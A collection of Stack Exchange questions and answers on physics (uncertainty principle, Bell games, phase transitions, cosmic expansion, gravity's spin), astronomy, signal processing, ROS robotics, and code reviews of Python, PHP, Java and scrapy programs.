This, can be used to calculate $$\sigma_{p}=\sqrt{ma\hbar}$$ It can similarly be shown that $$\langle x^{2}\rangle=\frac{\hbar}{4ma}$$ and $$\langle x \rangle= 0$$so $$\sigma_{x}=\sqrt{\frac{\hbar}{4ma}}$$ and finally: $$\sigma_{p}\sigma_{x}=\sqrt{\frac{\hbar^{2}ma}{4ma}}=\frac{\hbar}{2}\geq\frac{\hbar}{2}$$which agrees with the uncertainty principle. | {
"domain": "physics.stackexchange",
"id": 19329,
"tags": "quantum-mechanics, homework-and-exercises, operators, wavefunction, heisenberg-uncertainty-principle"
} |
Recursive bytearray hash function | Question: I need a function that hashes a list of different inputs (integral datatypes, strings, bytearrays) in a recursive manner.
def RecHash(v):
isSingleElementOfList = False
if type(v) is list and len(v) == 1:
isSingleElementList = True
if type(v) is not list or isSingleElementOfList: # if v is a single element
v0 = v
if isSingleElementOfList: v0 = v[0]
if type(v0) is bytearray or v0.__class__.__name__ == 'bytes':
return hash(v0)
if type(v0) is int:
return hash(ToByteArray(v0))
if type(v0) is str:
return hash(v0.encode('utf-8'))
return bytes()
else: # if v is a list
res = bytearray()
for vi in v:
res += RecHash(vi) # recursion
return hash(res) # hash the concatenated hashes
and the helper function:
def ToByteArray(x):
q, r = divmod(BitAbs(x),8)
q += bool(r)
return ToByteArrayN(x, q)
def ToByteArrayN(x, n):
B = bytearray()
for i in range(0, int(n)):
b = x % 256
x = x // 256 # // = integer division => floor
B.insert(0, b)
return bytes(B)
def BitAbs(i):
return i.bit_length()
It is working fine, however, it's very slow (and interestingly, it's not the hash() function that is slowing it down.).
Performance is worst when the list contains mostly numbers, so the ToByteArray function also doesn't seem to perform well.
Answer: As @pjz already noted in his answer, type(v0) is slow. However, I would recommend instead to use isinstance. This allows to use your class also with derived types. From help(isinstance):
isinstance(...)
isinstance(object, class-or-type-or-tuple) -> bool
Return whether an object is an instance of a class or of a subclass thereof.
With a type as second argument, return whether that is the object's type.
The form using a tuple, isinstance(x, (A, B, ...)), is a shortcut for
isinstance(x, A) or isinstance(x, B) or ... (etc.).
Imagine if I rolled my own int class, Int, which is derived from the base int class:
class Int(int):
pass
Your RecHash function would not work with this. If you use isinstance(v0, int), though, this would still be working.
if isinstance(v, list) and len(v) == 1:
isSingleElementList = True
if not isinstance(v, list) or isSingleElementOfList: # if v is a single element
v0 = v[0] if isSingleElementOfList else v
type_v0 = type(v0)
if isinstance(v0, bytearray) or v0.__class__.__name__ == 'bytes':
return hash(v0)
if isinstance(v0, int):
return hash(ToByteArray(v0))
if isinstance(v0, str):
return hash(v0.encode('utf-8'))
else: # if v is a list
res = bytearray()
for vi in v:
res += RecHash(vi) # recursion
return hash(res) # hash the concatenated hashes
Python has an official style-guide, PEP8. It recommends using lower_case for variable and function names, instead of PascalCase or camelCase. | {
"domain": "codereview.stackexchange",
"id": 24595,
"tags": "python, performance, python-3.x"
} |
A puzzle about how to write more clean and understandability code | Question: private function getFeatureByParam ($classname, $module, $action) {
$needFeature = array();
foreach ($this->featureConf as $featureIndex => $feature) {
if ($feature['classname'] == $classname &&
$feature['module'] == $module &&
$feature['action'] == $action) {
$needFeature = $feature;
break;
}
}
return $needFeature;
}
private function getFeatureByParam ($classname, $module, $action) {
foreach ($this->featureConf as $featureIndex => $feature) {
if ($feature['classname'] == $classname &&
$feature['module'] == $module &&
$feature['action'] == $action) {
return $feature;
}
}
return array();
}
The first style of writing is more understandability.
The second style of writing is more clean and efficient.
But witch one is more better? (Or they are too bad....)
Answer: Personally, option 2.
In option 1, by breaking out of the loop, you have to look down until after the end to see what happens, just to see a return.
In option 2, it's obvious what you want and when you get it. Although, I think the condition is a little complex.
There are, of course, other options:
private function getFeatureByParam ($classname, $module, $action) {
foreach ($this->featureConf as $featureIndex => $feature) {
if ($feature['classname'] != $classname) continue;
if ($feature['module'] != $module) continue;
if ($feature['action'] != $action) continue;
return $feature;
}
return array();
}
private function getFeatureByParam ($classname, $module, $action) {
foreach ($this->featureConf as $featureIndex => $feature) {
if ( featureMatches( $feature, $classname, $module, $action ) ) {
return $feature;
}
}
return array();
}
I'm inclined to option 4 :) | {
"domain": "codereview.stackexchange",
"id": 2934,
"tags": "php"
} |
What is the typical career path to become a professional Astronomer? | Question: Here is a typical question which I have been asked many times while giving public lectures in various places. While I know one of the paths like Diploma, Masters and PhD but sometimes this is not so obvious for that eager young person who thinks to go on that path. So what that would be?
Answer: You start out getting a Bachelor of Science in a related field. This could be physics, astronomy, mathematics, or possibly chemistry. Depending on which country you are planning to go to grad school in, specializing at this stage may not be as important as in later stages. However, note that in the UK, for example, it is almost unheard of for a student without a Bachelors in physics (almost always with a minor in astrophysics) to gain a place in grad school for astronomy.
After doing the BSc, you would go on to get a Masters degree in astronomy, which would set the stage for a PhD in astronomy. The PhD (and to some extent, the MSc) will have you specialize in a specific area in astronomy, such as star formation, planetary studies, or cosmology.
After doing the PhD, you would get a post-doc at a university or research institute. This is typically a three-year job where you do research in your chosen area. Most astronomers do two or three post-docs.
After this, you could become a professor or research associate at a university or an in-house research astronomer at an observatory. Universities or observatories are typically the only places to be a "professional astronomer", and depending on the position, would give you time to do your own research in conjunction with other duties like teaching. | {
"domain": "physics.stackexchange",
"id": 2964,
"tags": "astronomy, education"
} |
How did early chemists measure concentrations and purity? | Question: My chemistry teacher loves going back through the history of famous chemists. This got me wondering how these chemists would first determine the concentration of a sample before they had any other chemicals of known concentration to compare against?
What modern methods are there for determining concentrations and purity without other chemical standards to compare against?
Let me explain my question a little more clearly with an example.
If a historical scientist starts their own laboratory and wanted to do a titration, how would they start? They might produce some hydrochloric acid, or some barium sulfate, and want to confirm its concentration/purity. However, this would require they already know the concentration of something else, which they don't. So it seems a little paradoxical. How did they ever start performing analytical experiments?
Answer: Not everything comes as a solution. Rather, the historical chemist would have started of with solid substances. These were purified according to ‘established procedures’ (distillation, recrystallisation, dissolution and precipitation) which worked quite well. Then, one of these substances would have been used to make a stock solution — and because it is solid you can simply weigh it.
Now you might assume that the historical chemist had no knowledge on how two substances would react — which is likely true. However, once he knew the composition of one type of solution, he was able to express the other in equivalents: ‘this solution is able to reduce two equivalents of the permanganate solution’ (using the first example that jumped to my head; not sure whether that is actually a likely thought).
Going via the diversion of analytical chemistry (is this a compound or an element?), it was established that a law of multiple proportions existed: if two elements form more than one compound, the mass ratio of one of those elements is always a simple integer ratio. This was easily extended to reactions: if something reacted with 2 equivalents of A but 1.5 equivalents of B, then maybe it wasn’t the concentration I assumed but I should multiply by two?
Over time and more data points, the current system would have been established. | {
"domain": "chemistry.stackexchange",
"id": 6844,
"tags": "analytical-chemistry, titration, history-of-chemistry"
} |
Bell inequality as a game: Why is it impossible to always win? | Question: Another Bell's Theorem Question
I am trying to follow the simple model of Bell's Theorem outlined in this paper: https://people.eecs.berkeley.edu/~vazirani/s07quantum/notes/lecture1.pdf. Please read section 5 for details, but basically he outlines a communication protocol where two people $A$ and $B$ receive a bit each ($X_a$ and $X_b$). They than each have to independently produce new bits ($a$ and $b$). $A$ and $B$ are trying to cooperatively maximize the probability that $$a\ XOR\ b = X_a\ AND\ X_b$$
There is a trivial strategy that wins 75 percent of the time. Always produce $a$ and $b$ of 0. The last section describes the strategy that wins more than 75% of the time in quantum mechanics and disproves 'local hidden variables'. From my understanding a local hidden variable theory would be one where the two particles before they were separated planned out every possible result of any possible experiment that could be performed once they are separated. This way there was no FTL communication.
My questions are as follows:
If in the quantum version of the game they always have the EPR pair, than why can't they win 100 percent of the time? If A measures 1 he produces 1 and B always produces 0. I don't get what this has to do with quantum mechanics since this strategy could be devised even if hidden variable theory was 'true' and the two particles 'agreed' on there configurations before they were separated in space.
In the protocol at the end he says if $X_a$ = 0 than do a certain measurement. What is the output produced by the strategy? It is very unclear. Is the output the result of the measurement?
Also don't you have to perform a measurement to know that $X_a$ = 0? Wouldn't this already affect the state EPR pair before you made the second measurement?
Am I fundamentally missing something?
Answer: According to the source: Alice and Bob are each handed a single random classical bit $X_a$ and $X_b$ and they also share a pair or maximally entangled qubits in the state $|\psi\rangle=(|00\rangle+|11\rangle)/\sqrt{2}$.
Now based on this $X_a ∧ X_b = 0$ unless both $X_a$ and $X_b=1$ (definition of the logical "and" operator, $∧$). Because $X_a$ and $X_b$ are random and independent, this means that $X_a ∧ X_b$ is random and $=0$ 75% of the time and =1 only 25% of the time.
Now you are correct that Alice and Bob can always guarentee that the outcome of their measurements is the same if they both measure in the same basis or always the opposite (e.g. one measure in the $|0\rangle$ or $|1\rangle$ basis and the other measures in the swapped, $|1\rangle$ or $|0\rangle$ basis). However, taking the xor operation on the output means that Alice and Bob can choose to always have $a⊕b=0$ (by measuring in the same bases) or $a⊕b=1$ (by measuring the swapped bases). Therefore, always choosing a deterministicly correlated/anti-correlated measurement scheme means that you only win either 25% or 75% of the time (because remember $X_a ∧ X_b =0$ 75% of the time and 1 25%).
Because $X_a$ and $X_b$ are random and independent, Alice and Bob gain no information from the actual value of their random bit and so can't use this information alone to do better than 75%. However, since the $X_a ∧ X_b$ outcome is random but biased, they can use the rules of quantum mechanics to create random bits $a$ and $b$ that are biased in such a way as to get higher than 75% by measuring in different bases as given by the example in the reference. However, maximizing over possible measurement schemes never gives you 100% (and the answer in the reference is the maximum probability you can win). | {
"domain": "physics.stackexchange",
"id": 53524,
"tags": "quantum-mechanics, quantum-interpretations, bells-inequality"
} |
How do I force Cromwell / WDL to put input files in the same directory? | Question: I have a cromwell task that, among other variables, takes these three variables:
File Ref # Reference genome fasta
File RefFai # Reference Genome index
File RefDict # Reference Dictionary
While all three files make it into the task's "inputs" directory, they end up in different sub-directories of inputs:
ME $ find inputs
inputs
inputs/-181926642
inputs/-181926642/Sample.vcf.bgz.tbi
inputs/-181926642/Sample.vcf.bgz
inputs/-1548908437
inputs/-1548908437/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.dict
inputs/44588251
inputs/44588251/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.fa
inputs/44588251/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.fa.fai
Which means that when I call GATK and pass it the path to the .fa file, it gets rather cranky that the .dict file isn't in the same directory.
How do I force cromwell to put all three files in the same directory?
Answer: My hacktastic fix for this is to use basename to get the name of each file, then do
refName=`basename "${Ref}"`
ln -s "${Ref}" "$refName"
for each file. This puts aliases to each file in the executions dir, and then I pass "refName" to GATK rather than "${Ref}".
Not a good solution, but a solution | {
"domain": "bioinformatics.stackexchange",
"id": 2474,
"tags": "wdl"
} |
How does temperature change in a system after removing a certain mass (at first order) | Question: Let's say I have a volume $V$ filled with water of temperature $T$. Now I remove a mass of water, $\Delta m$, and I want to know how this affects the temperature in V at first order neglecting all other heat transfer in and out of the volume and other fancy stuff. I would take
a simple form of the equation of energy balance so that temperature change in $V$ reflects the energy $Q$ that is taken out:
$$
V\rho c \Delta T = Q
$$
where $\rho$ is the density and $c$ is the specific heat capacity.
Now I have 3 questions.
1) Does the removal of the mass have any effect on temperature at all?
If yes, 2) Can I assume that the energy of the removed mass is
$$
Q = c \Delta m T
$$
or is this wrong? If it's possible, then 3) do I use temperature in °Celsius or in Kelvin?
$c$ is sometimes reported with °C and sometimes with K, because, as I understand it, it usually relates to a temperature difference rather than absolute temperature (meaning it doesn't make a difference). Used with an absolute temperature (as in this case, unless I'm wrong) it does make a difference though, so I'm not sure how to handle this here.
Answer: Let's consider what will happen when we remove that mass.
For starters, we assume this has homogeneous temperature.
Now, the first thing that seems to be confusing you may be how they define heat energy. It's relative. You are not measuring the absolute heat of the water, you are measuring the heat added (or removed) when going from one temperature to another ($\Delta T$).
You said we are not considering the heat transfer. When you remove a mass, you aren't replacing it with cold water; you're just not considering it as part of your system anymore.
Your value of $Q$ (heat) will change, because you now have less of the warm object. The value of $\Delta T$ will remain the same; because you didn't allow for any heat transfer to lower the temperature.
Lets say you had 2 apples sitting beside each other at the same temperature. They have a heat energy associated with their temperature, mass, and heat capacity ($Q=mc\Delta T$). If you take away one apple, consider what happens to the remaining apple. It does not suddenly lose temperature just because there is no other apple there. Instead, the whole system has less thermal energy ($Q$) due to the lower mass. $\Delta T$ remains constant. | {
"domain": "physics.stackexchange",
"id": 40667,
"tags": "thermodynamics, energy, temperature"
} |
Is mass the only factor which affects Newton's Third Law? | Question: I've had a hard time understanding Newton's third law. From my textbooks, it can be inferred that the reaction of the object differs based on its mass. For example, if skater A pushes skater B, the lighter skater will accelerate further. However, based on readings on this website, other factors such as friction are being discussed in for example, a person pushing a table.
This has confused me, and it would be of great help if someone were to help me truly understand this law.
Answer:
For example, if skater A pushes skater B, the lighter skater will accelerate further.
Good enough so far.
But you should be careful about the reasoning. Newton's third law says that when skater A pushes on skater B, there is an equal force applied by skater B to skater A (Mass isn't actually a consideration in Newton's third law). It's Newton's second law that tells you this will result in the lighter skater experiencing more acceleration.
However, based on readings on this website, other factors such as friction are being discussed in for example, a person pushing a table.
Friction doesn't change Newton's laws. It just introduces a third object (the Earth) into the system.
Newton's third law says, if I push on the table, there is an equal force pushing back on me. Friction means that the table will also be pushing on the Earth beneath it, and (because of Newton's third law) the Earth will also push back on the table. Newton's third law hasn't changed, we just have to consider two interactions where it applies, instead of one. | {
"domain": "physics.stackexchange",
"id": 72348,
"tags": "newtonian-mechanics, forces, mass, free-body-diagram"
} |
(Why) does the late radiation after page time entangle with the early radiation? | Question: In Jerusalem lectures by Harlow Pg. 53 it is said that
At the beginning of the
evaporation process the radiation that comes out is entangled with the remaining black
hole. But eventually it must start coming out entangled with the earlier radiation,
since eventually the final state of the radiation must be pure.
Why is the late radiation i.e. the radiation that comes out after the Page time entangled with the earlier radiation to purify itself instead of entangling itself with the remaining black hole?
Is it because the black hole has a different state space?
I found a supposed answer by Polchinski
With the black hole, the internal excitations are behind the horizon, and cannot influence the state of later photons.
So it seems Polchinski is using causality to argue against entanglement with interior methods. But why then won't it then hold for early photons? (He does use the word "late" and we know the early modes are entangled with the interior).
Instead I would expect by Page's theorem that the remaining old black hole is maximally mixed and forms a maximally entangled pure state with the early radiation at late times, but then why isn't this mentioned in Harlow's quote?
I can understand the Page curve and its qualitative derivation as given in Harlow but not the "intuitive" description by Harlow that follows the derivation on pg. 53. How to arrive at what couples with what after the Page time from the Page curve itself?
Condensing these questions amounts to asking the titular question which can be expanded and rephrased as as:
Do the small old black hole entangle with the early radiation or does the late radiation does and why?
Answer: This is a basic consequence of the assumption (done in pag. 47) that the black hole evaporation process is unitary. Since eventually the radiation must be be in a pure state and the black hole will evaporate, the late radiation must somehow purify the early radiation. Explaining in detail how this happen is part of solving the information paradox, on which we recently made some progress in AdS/CFT, see for instance results by Penington such as Entanglement Wedge Reconstruction and the Information Paradox
. | {
"domain": "physics.stackexchange",
"id": 99381,
"tags": "black-holes, quantum-information, thermal-radiation, hawking-radiation, ads-cft"
} |
Fourier transform of dirac comb with function: The scaling factor | Question: Multiplication in the time domain corresponds to convolution in the frequency domain:
$$
f(t) \cdot x(t) \iff F(j \omega) * X( j \omega) \tag*{No scaling factor}
$$
I know the fourier transform of the dirac comb is:
$$
\mathcal{F} \big \{ \text{III}_{T_{s}} (t) \big \} = \omega_{s} \cdot \text{III}_{T_{s} } (j \omega)
$$
But according to oppenheim and others:
$$
\mathcal{F} \big \{ f(t) \cdot \text{III}_{T_{s}} (t) \} = \underbrace{\dfrac{1}{T_{s}}}_{\text{scaling factor}} \cdot \displaystyle \sum_{k \to - \infty}^{ k \to \infty} X(j( \omega - k \omega_{s} )) \text{ (Scaling factor)}
$$
So my question is, for the above, why does the scaling factor not remain $$ \omega_{s} $$ why does it become $$ \dfrac{1}{T_{s}} $$
Which means that
$$
x(t) \cdot y(t) \iff \dfrac{1}{2 \pi} X(j \omega) * Y(j \omega) \tag{ ??? }
$$
Why does the scaling factor not remain the sampling angular velocity?
Answer: Your first formula is wrong. If you use angular frequency ($\omega$), then multiplication in the time domain corresponds to $1/(2\pi)$ times convolution in the frequency domain, just as in the last formula in your question:
$$\mathcal{F}\{x(t)\cdot y(t)\}=\frac{1}{2\pi}X(j\omega)\star Y(j\omega)\tag{1}$$
If you use frequency $f=\omega/(2\pi)$, then you get
$$\mathcal{F}\{u(t)\cdot v(t)\}=U(f)\star V(f)\tag{2}$$
where I've used the definitions
$$X(j\omega)=\int_{-\infty}^{\infty}x(t)e^{-j\omega t}dt\tag{3}$$
$$U(f)=\int_{-\infty}^{\infty}u(t)e^{-j2\pi f t}dt\tag{4}$$ | {
"domain": "dsp.stackexchange",
"id": 7472,
"tags": "discrete-signals, sampling, fourier, dirac-delta-impulse"
} |
How are the transverse velocity and proper motion of a star related? | Question: For a star the proper motion, $\mu$, is usually measured in arcseconds per year. The diagram below illustrates how the quantities of radial, tangential and true velocity are related. The radial and tangential velocities are clearly components of the true velocity that have been resolved usefully relative to an observer on the Sun.
Given a known value of $\mu$, this link states that the tangential velocity, $V_\theta$, is related to the proper motion by the equation
$$V_\theta = 4.7\mu d$$
where $d$ is the distance, and $V_\theta$ is the tangential velocity. I am unsure of where the factor of $4.7$ comes from. However, other sources give it as $V_\theta = \mu d$, although they do not define any units.
Could anyone confirm the units of the above quantities, and which equation is correct, as well as the origin of the 4.7?
Answer: Both equations are correct. The factor of $4.7$ comes from the unit conversion:
$$\frac{({\rm arcsec}\,{\rm yr}^{-1})({\rm pc})}{{\rm km}\,{\rm s}^{-1}} = \frac{(4.84\times10^{-6}\,{\rm rad})\,(3.154\times10^{7}\,{\rm s})^{-1}(3.086\times10^{13}\,{\rm km})}{{\rm km}\,{\rm s}^{-1}} = 4.7$$
Note that I've used the "small angle approximation" $\sin(x)\approx x$ for $x\approx0$, so I can treat ${\rm rad}$ as dimensionless.
If you use simple $V_{\theta}=\mu d$, you will get the same answer, but when you input the values you'll need to do any applicable unit conversion yourself. | {
"domain": "physics.stackexchange",
"id": 90321,
"tags": "astrophysics, astronomy, velocity, distance"
} |
Writing to a csv file in a customized way using scrapy | Question: I've written a script in scrapy to grab different names and links from different pages of a website and write those parsed items in a csv file. When I run my script, I get the results accordingly and find a data filled in csv file. I'm using python 3.5, so when I use scrapy's built-in command to write data in a csv file, I do get a csv file with blank lines in every alternate row. Eventually, I tried the below way to achieve the flawless output (with no blank lines in between). Now, It produces a csv file fixing blank line issues. I hope I did it in the right way. However, if there is anything I can/should do to make it more robust, I'm happy to cope with.
This is my script which provides me with a flawless output in a csv file:
import scrapy ,csv
from scrapy.crawler import CrawlerProcess
class GetInfoSpider(scrapy.Spider):
name = "infrarail"
start_urls= ['http://www.infrarail.com/2018/exhibitor-profile/?e={}'.format(page) for page in range(65,70)]
def __init__(self):
self.infile = open("output.csv","w",newline="")
def parse(self, response):
for q in response.css("article.contentslim"):
name = q.css("h1::text").extract_first()
link = q.css("p a::attr(href)").extract_first()
yield {'Name':name,'Link':link}
writer = csv.writer(self.infile)
writer.writerow([name,link])
c = CrawlerProcess({
'USER_AGENT': 'Mozilla/5.0',
})
c.crawl(GetInfoSpider)
c.start()
Btw, I used .CrawlerProcess() to be able to run my spider from sublime text editor.
Answer: You should opt for closed() method as I've tried below. This method will be called automatically once your spider is closed. This method provides a shortcut to signals.connect() for the spider_closed signal.
class InfraRailSpider(scrapy.Spider):
name = "infrarail"
start_urls = ['https://www.infrarail.com/2020/english/exhibitor-list/2018/']
def __init__(self):
self.outfile = open("output.csv", "w", newline="")
self.writer = csv.writer(self.outfile)
self.writer.writerow(['title'])
print("***"*20,"opened")
def closed(self,reason):
self.outfile.close()
print("***"*20,"closed")
def parse(self, response):
for item in response.css('#exhibitor_list > [class^="e"]'):
name = item.css('p.basic > b::text').get()
self.writer.writerow([name])
yield {'name':name} | {
"domain": "codereview.stackexchange",
"id": 31153,
"tags": "python, python-3.x, csv, web-scraping, scrapy"
} |
Could it be possible that the Universe is expanding in some areas while contracting in other areas? | Question: I am wondering if could it be possible that the Universe is expanding in some areas while contracting in other areas.
I have wondered if perhaps as one area of the Universe is squeezed inward by some force, a force such as dark energy, all the matter that is within that squeezed space is flowing outward in all directions and causing the areas outside of the squeezed space to expand via the influx of new matter. This would be similar to when you hold a small water balloon in your hand and then squeeze it.
Moreover, perhaps there may be multiple areas throughout the Universe that are being squeezed and multiple areas that are expanding at any given moment. Perhaps this could be an alternate explanation as to why galaxies are moving in different directions throughout the Universe. The overall volume of the Universe would always same the same, especially considering that energy/matter cannot be created or destroyed.
Could it be possible that the Universe is expanding in some areas while contracting in other areas?
Answer: The universe is indeed expanding in some places and contracting in others. That's why we have galaxies: regions of the universe that were denser than average eventually stopped expanding, turned around, and collapsed. At larger scales, our Local Group is contracting but has not collapsed yet. Conversely, cosmic voids are regions where the density is lower than average, and the expansion there is faster than the global expansion rate.
You will notice that I am speaking of the expansion of the material within the universe, and not the expansion of space itself. That's because the expansion of space is not even a local physical phenomenon in the first place! It's a common misconception that space is some sort of medium that expands and carries things with it. Expanding space has no such effect -- it is really just a convention that simplifies the mathematics in cosmological contexts. It's a coordinate choice.
See this answer for further reading on "expanding space" not being a local physical phenomenon. There are also other Stack Exchange discussions of this point, e.g. "Is the universe actually expanding?" and "Can the Hubble constant be measured locally?" Incorrect answers to these questions are unfortunately common and frequently upvoted, a testament to how tenacious this misconception is, but I've linked correct answers.
It's worth noting, though, that expanding space can have concrete meaning globally, in the sense that the total volume of a closed universe -- measured on the synchronous surfaces of comoving observers -- grows.
Also, there is a local expansion force induced by dark energy. This is sometimes conflated with cosmic expansion, but it's really just a consequence of the local dark energy content (or cosmological constant). If you intend to ask whether this force spatially varies, to the best of our knowledge it does not, but this would be better suited for a separate answer (perhaps even a separate question). | {
"domain": "physics.stackexchange",
"id": 94524,
"tags": "cosmology, spacetime, astrophysics, space-expansion, universe"
} |
rtabmap+camera pose | Question:
hi all, i am using rtabmap for mapping and stereo camera pose estimate. i am following tutorials of rtabmap and created map from stereo images that these images save at file (link tutorials: https://github.com/introlab/rtabmap/wiki/Stereo-mapping#process-a-directory-of-stereo-images-in-ros) but when roslaunch the launch file, from 1035 stereo images, rtabmap give me 44 pose camera. how can set rtabmap that this give me camera pose for per stereo image?
thanks
Originally posted by zahra.kh on ROS Answers with karma: 21 on 2017-10-29
Post score: 0
Answer:
Add "--Rtabmap/CreateIntermediateNodes true" to rtabmap_args. This will add empty nodes in the graph with their pose between nodes used for mapping. You may not have one pose per image if the odometry cannot process as fast as the images are published.
Originally posted by matlabbe with karma: 6409 on 2017-10-29
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by zahra.kh on 2017-10-29:
thanks matlabbe | {
"domain": "robotics.stackexchange",
"id": 29219,
"tags": "slam, navigation, rtabmap"
} |
actionlib and rqt | Question:
Hello,
I'm learning ROS now and trying to create an action client in my rqt plugin.
No problem to catkin build the plugin. But when load the plugin, I got error as below:
undefined symbol: _ZN9actionlib17ConnectionMonitor21cancelConnectCallbackERKN3ros25SingleSubscriberPublisherE)
Unmangled:
actionlib::ConnectionMonitor::cancelConnectCallback(ros::SingleSubscriberPublisher const&)
My code is similar to the following. Is it a rqt bug, or is there anything wrong in my code?
Thank you for your help!
class MyPlugin : public rqt_gui_cpp::Plugin
{
Q_OBJECT
public:
MyPlugin();
virtual void initPlugin(qt_gui_cpp::PluginContext& context);
virtual void shutdownPlugin();
private
Ui::MyPluginWidget ui_;
QWidget* widget_;
actionlib::SimpleActionClient<my_msgs::MyAction> aClient;
}
MyPlugin::MypPlugin()
: rqt_gui_cpp::Plugin()
, widget_(0)
, aClient("some action")
{
setObjectName("Plugin");
}
Originally posted by Fulin on ROS Answers with karma: 11 on 2017-09-28
Post score: 0
Original comments
Comment by gvdhoorn on 2017-09-28:
I've added the unmangled version of the missing symbol to your question text.
Comment by Fulin on 2017-09-29:
Hi Gvdhoom,
By the way, where should I use
actionlib::ConnectionMonitor::cancelConnectCallback(ros::SingleSubscriberPublisher const&)
in shutdownPlugin()?
Thank you!
Comment by gvdhoorn on 2017-09-29:
That is a different issue, so I advise you to post that as a new question. We try to maintain a 1 question - 1 answer ratio here on ROS Answers.
Answer:
Are you linking all required libraries? Can you show your CMakeLists.txt? The fact that CMake currently does not complain is expected: plugins don't need all symbols present at compile time, as it is assumed that at runtime those will be resolved by the plugin host.
Originally posted by gvdhoorn with karma: 86574 on 2017-09-28
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by Fulin on 2017-09-29:
Hi Gvdhoom,
You are right,
I missed the actionlib related depends in CMakeLists.txt and package.xml files. Might be the boost also? After adding them, now it works fine.
Thank you! | {
"domain": "robotics.stackexchange",
"id": 28953,
"tags": "actionlib, rqt"
} |
Calculating Garland Degree of String | Question: Purpose
A garland word is a word
formed by chopping off the last few letters and “wrapping around” to the start.
For example: You can chop off the the trailing “on” from “onion” and still form the word by wrapping around to the starting “on”. In other words, you can write the letters “o”, “n”, “i” in a circle, in that order, and form the word “onion”.
I say that a garland word is of degree n if you can do the above with the last n letters of the word.
Build an implementation that returns the garland degree of a String. (Note, this was a dailyprogrammer subreddit question)
Strategy
Check if String is size 0 (return garland degree of 0) or size 1 (return garland degree of 1).
Start with the first character in the String. Iterate through the characters in the String from the second character onwards. Do we see a matching character? If not, return size 0.
Move on to the first + second characters in the String. Iterate through the characters in the String from the 3rd character onwards for a matching substring - if we can't see one, return size 1.
Repeat.
Note that the upper limit of the garland degree should be the the floor of the length of the String divided by 2. (Right? Or am I missing something?)
Implementation
public class GarlandDegreeIdentifierImpl implements GarlandDegreeIdentifier {
@Override
public int identifyGarlandDegree(final String candidate) {
switch (candidate.length()) {
case 0: {
return 0;
}
case 1: {
return 1;
}
default: {
final char[] chars = candidate.toCharArray();
for (int subStringIndex = 1; subStringIndex <= chars.length - subStringIndex; subStringIndex++) {
final char[] startingChars = Arrays.copyOfRange(chars, 0, subStringIndex);
final char[] remainingChars = Arrays.copyOfRange(chars, subStringIndex, chars.length);
if (subsetIndexIdentifier(remainingChars, startingChars) == -1) {
return subStringIndex - 1;
}
}
return Math.floorDiv(chars.length, 2);
}
}
}
@Override
public int subsetIndexIdentifier(final char[] chars, final char[] candidateChars) {
for (int index = 0; index <= chars.length - candidateChars.length; index++) {
int counter = 0;
for (int candidateCharIndex = 0; candidateCharIndex < candidateChars.length; candidateCharIndex++) {
if (chars[index + candidateCharIndex] != candidateChars[candidateCharIndex]) {
counter++;
}
}
if (0 == counter) {
return index;
}
}
return -1;
}
}
Answer: You are completely over-doing it. Your algorithm will be O(n3) (I think) on the length of the input when you can do it more simply in O(n2).
Consider the following instead:
Start at the middle of the input.
While the substring starting from this index is not equal the substring beginning the start of the input with the same length, we increment the index.
Finally, we return the length of the final substring that matched.
Basically, the logic can be summed up by this drawing:
-------------
^^^^^^ ^^^^^^ matches or not?
// if no continue
-------------
^^^^^ ^^^^^ matches or not?
// if no continue
-------------
^^^^ ^^^^ matches or not?
You can see the logic.
Implemented in code, it would be the following:
private static int identifyGarlandDegree(String candidate) {
int length = candidate.length();
int index = length / 2;
while (!candidate.substring(0, length - index).equals(candidate.substring(index))) {
index++;
}
return length - index;
}
Note that we don't need to add a check on index: it won't go out of bounds since when index == length, it will exit normally (empty string being equal to another empty string). | {
"domain": "codereview.stackexchange",
"id": 18388,
"tags": "java, strings, programming-challenge"
} |
Isn't the transition at the critical point always a continuous phase transition? | Question: At page 145 of Chaikin and Lubensky's Principles of Condensed matter physics, there are two figures 4.0.1(a) and 4.0.1(b). Figure (a) shows that at $T=T_c$, there is a continuous transition (the order parameter changes continuously) while figure (b) shows that at $T=T_c$ there is a discontinuous transition (the order parameter jumps discontinuously).
But isn't the transition at the critical point always continuous? How would the second situation as described in diagram (b) (the order parameter suddenly jumping to a nonzero value from a zero value) arise at the critical point?
Answer: Simple example: Water-ice transition. If you take the density to be your order parameter, the density drops discontinuously at $0^\text{o}$ C.
A second simple example: An Ising model in an external field at $T=0$. If the external field, $H$, is positive, the magnetization, $M$, is $+1$. If the external field is negative, $M=-1$. Clearly $M$ changes discontinuously at $H=0$.
A third, more complex example: A 2D Ising model below the critical temperature. If you don't like the fact that the above transition takes place at $T=0$, in 2D the Ising model spontaneously magnetizes even at small nonzero temperatures. In this case, just above $H=0$, $M=M_0$, and just below $H=0$, $M=-M_0$. $M$ jumps discontinuously.
In general, a critical point is where any phase transition occurs, continuous or discontinuous. It refers to the combination of parameters that sit on the boundary between one phase and another. So a critical temperature is the temperature that separates two phases (Any phases! Any type of transition!) and a critical field is the field that separates two phases, etc.
If you think about Landau theory, a first-order (discontinuous) phase transition happens when the Landau free energy has two local minima, and the global minima changes from one value to another. Consider the following graph, where $\phi$ is the order parameter and $\mathcal{L}$ is the Landau free energy.
Here, just above $T_c$, the Landau free energy has two local minima, at $\phi=0$ and $\phi>0$. Above $T_c$, $\phi=0$ is the global minimum. At $T_c$, the two minima have the same value for the Landau free energy. Below $T_c$, the minimum with $\phi>0$ has the lowest Landau free energy. Thus, above $T_c$, the system will have $\phi=0$, and below $T_c$ the system will have $\phi>0$ discontinuously. | {
"domain": "physics.stackexchange",
"id": 42173,
"tags": "statistical-mechanics, condensed-matter, phase-transition, critical-phenomena"
} |
How can I read off the fact that gravity is associated with spin-2 particles from the Einstein-Hilbert action? | Question: I have often heard that the gravitational field has spin $2$. How can I read the spin of the field from the Einstein-Hilbert action
$$S=\int \! \mathrm{d}^4x \,\sqrt{|g|} \, \mathcal{R} \, \, \, ?$$
Answer: A common procedure to determine the spin of the excitations of a quantum field is to first determine the conserved currents arising from quasi-symmetries via Noether's theorem. For example, in the case of the Dirac field, described by the Lagrangian,
$$\mathcal{L}=\bar{\psi}(i\gamma^\mu \partial_\mu -m)\psi $$
the associated conserved currents under a translation are,
$$T^{\mu \nu} = i \bar{\psi}\gamma^\mu \partial^\nu \psi - \eta^{\mu \nu} \mathcal{L}$$
